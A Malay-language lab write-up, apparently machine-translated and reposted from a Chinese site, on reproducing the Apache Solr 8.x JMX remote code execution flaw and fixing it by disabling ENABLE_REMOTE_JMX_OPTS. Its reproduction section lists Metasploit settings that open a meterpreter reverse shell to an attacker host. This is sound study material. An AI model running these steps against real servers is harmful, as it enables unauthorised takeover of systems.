Bagaimana untuk menghasilkan semula kerentanan RCE dalam perkhidmatan Apache Solr JMX

WBOY
Lepaskan: 2023-05-14 14:25:06
ke hadapan
1456 orang telah melayarinya

Pengenalan 0x00

Solr ialah pelayan aplikasi carian peringkat perusahaan bebas yang menyediakan antara muka API yang serupa dengan perkhidmatan Web. Pengguna boleh menyerahkan fail XML dalam format tertentu ke pelayan enjin carian melalui permintaan http untuk menjana indeks mereka juga boleh membuat permintaan carian melalui operasi Http Get dan mendapatkan hasil yang dikembalikan dalam format XML.

Kerentanan ini berpunca daripada risiko keselamatan dalam pilihan konfigurasi ENABLE_REMOTE_JMX_OPTS dalam fail konfigurasi lalai solr.in.sh.

Pilihan ENABLE_REMOTE_JMX_OPTS="true" wujud dalam fail konfigurasi terbina dalam solr.in.sh versi 8.1.1 dan 8.2.0 Apache Solr.

Jika anda menggunakan fail solr.in.sh lalai daripada versi yang terjejas, maka pemantauan JMX akan didayakan dan didedahkan pada RMI_PORT (default=18983),

dan tiada apa yang perlu dilakukan Pengesahan. Jika port ini dibuka untuk trafik masuk dalam tembok api, sesiapa sahaja yang mempunyai akses rangkaian ke nod Solr akan dapat mengakses JMX dan memuat naik kod hasad untuk pelaksanaan pada pelayan Solr. Kerentanan ini tidak menjejaskan pengguna sistem Windows, tetapi hanya memberi kesan kepada pengguna beberapa versi Linux.

0x01 versi terjejas

Masa dalam talian versi Apache Solr8.1.1: 2019-05-28

Masa dalam talian versi Apache Solr8.2.0: 2019- 07-25

bahaya kerentanan 0x02

Jika mangsa menggunakan konfigurasi lalai ini, perkhidmatan JMX akan dibuka pada port lalai 18983 dan pengesahan tidak akan didayakan secara lalai. Mana-mana penyerang yang mempunyai akses kepada port ini boleh mengeksploitasi kelemahan ini untuk melancarkan serangan ke atas perkhidmatan yang terjejas dan melaksanakan kod sewenang-wenangnya.

Pembinaan persekitaran 0x03

Persekitaran Java dan sistem kali, Solr 8.20

Alamat muat turun Solr 8.20:

wget http:/ /archive.apache.org/dist/lucene/solr/8.2.0/solr-8.2.0.zip

如何进行Apache Solr JMX服务RCE漏洞复现Gunakan unzip solr-8.2.0.zip untuk nyahzip

如何进行Apache Solr JMX服务RCE漏洞复现Selepas penyahmampatan selesai, tukar ke direktori bin untuk memulakan Solr

./solr start -force

如何进行Apache Solr JMX服务RCE漏洞复现Lawati selepas permulaan: http://192.168.10.176:8983/

如何进行Apache Solr JMX服务RCE漏洞复现

0x04 berulang kerentanan

Mesin mangsa: docker IP dalam Ubuntu18.6: 192.168.10.184:8983

1

2 Gunakan modul exploit/multi/misc/java_jmx_server dalam Metasploit untuk menghasilkan semula kerentanan如何进行Apache Solr JMX服务RCE漏洞复现

Ø gunakan exploit/multi/misc/java_jmx_serverØ set RHOST 192.168.10.184

Ø set RPORT 18983

Tetapkan muatan: java/meterpreter/reverse_tcp

Ø tetapkan LHOST 192.168.10.147

Ø tetapkan LPORT 4444

3 anda akan melihat sambungan penubuhan yang berjaya

如何进行Apache Solr JMX服务RCE漏洞复现

Cadangan Betulkan 0x05

如何进行Apache Solr JMX服务RCE漏洞复现

Tetapkan pilihan ENABLE_REMOTE_JMX_OPTS dalam fail konfigurasi solr.in.sh kepada palsu dan mulakan semula Servis Solr.

Atas ialah kandungan terperinci Bagaimana untuk menghasilkan semula kerentanan RCE dalam perkhidmatan Apache Solr JMX. Untuk maklumat lanjut, sila ikut artikel berkaitan lain di laman web China PHP!

Label berkaitan:
sumber:yisu.com
Kenyataan Laman Web ini
Kandungan artikel ini disumbangkan secara sukarela oleh netizen, dan hak cipta adalah milik pengarang asal. Laman web ini tidak memikul tanggungjawab undang-undang yang sepadan. Jika anda menemui sebarang kandungan yang disyaki plagiarisme atau pelanggaran, sila hubungi admin@php.cn
Tutorial Popular
Lagi>
Muat turun terkini
Lagi>
kesan web
Kod sumber laman web
Bahan laman web
Templat hujung hadapan